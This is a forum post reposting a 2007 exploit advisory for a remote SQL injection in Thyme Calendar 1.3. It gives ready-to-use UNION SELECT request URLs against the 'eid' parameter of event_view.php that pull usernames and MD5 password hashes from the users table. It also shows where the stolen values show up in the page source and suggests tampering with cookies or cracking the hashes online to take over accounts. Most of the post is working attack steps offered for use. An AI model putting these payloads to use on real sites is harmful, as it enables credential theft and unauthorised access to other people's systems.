Jump to content
Ras

Thyme Calendar 1.3 Remote SQL Injection Vuln

Recommended Posts

Posted
                 ##################################################
## Thyme Calendar 1.3 SQL Vulnerability Exploit ##
## by Warlord ##
##################################################
## codehook.110mb.com ##
##################################################

-------------------------------------------------------------------
OVERVIEW AND DEFINITION
-------------------------------------------------------------------

A vulnerability in exists in Thyme Calendar 1.3 (and possibly lower
versions) which
allows execution of a custom SQL query.

The vulnerability exists in event_view.php, because the 'eid' field is not
properly
validated. An attacker could exploit the vulnerabilit with the following
request:


[url]http://sitename/thyme_directory/event_view.php?eid=34[/url] UNION SELECT userid
FROM thyme_Users


Where 'sitename' is the name of the site, and 'thyme_directory' is the
directory in which
Thyme is located.

-------------------------------------------------------------------
SQL QUERY
-------------------------------------------------------------------

The SQL query originally looks like this:


SELECT id FROM thyme_Attachments WHERE eid = 34


But by changing the 'eid' field we get a query that looks like this:


SELECT id FROM thyme_Attachments WHERE eid = 34 UNION SELECT userid FROM
thyme_Users

-------------------------------------------------------------------
RESULT OF NEW QUERY
-------------------------------------------------------------------

The result is that the query sends back all the userid's (actually
usernames) from the
database instead of the 'id' from thyme_Attachments. You will be able to
grab the userid's
from the HTML source by searching for 'aid=' as this is where the attachment
id is
supposed to go. For example:

[url]http://sitename/thyme_directory/download_attachment.php?aid=admin[/url]

-------------------------------------------------------------------
GETTING PASSWORDS
-------------------------------------------------------------------

And the password (md5'd) can be obtained in the same fashion:

[url]http://sitename/thyme_directory/event_view.php?eid=34[/url] UNION SELECT pass FROM
thyme_Users
WHERE username = "admin"

In the HTML source:

[url]http://sitename/thyme_directory/download_attachment.php?aid=9ab1c5afa4946ca0030271736f38c83a[/url]

-------------------------------------------------------------------
HOW TO EXPLOIT
-------------------------------------------------------------------

Cookies should be modifiable. If not, crack the md5!

[url]http://md5.rednoize.com[/url]

# milw0rm.com [2007-05-10]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...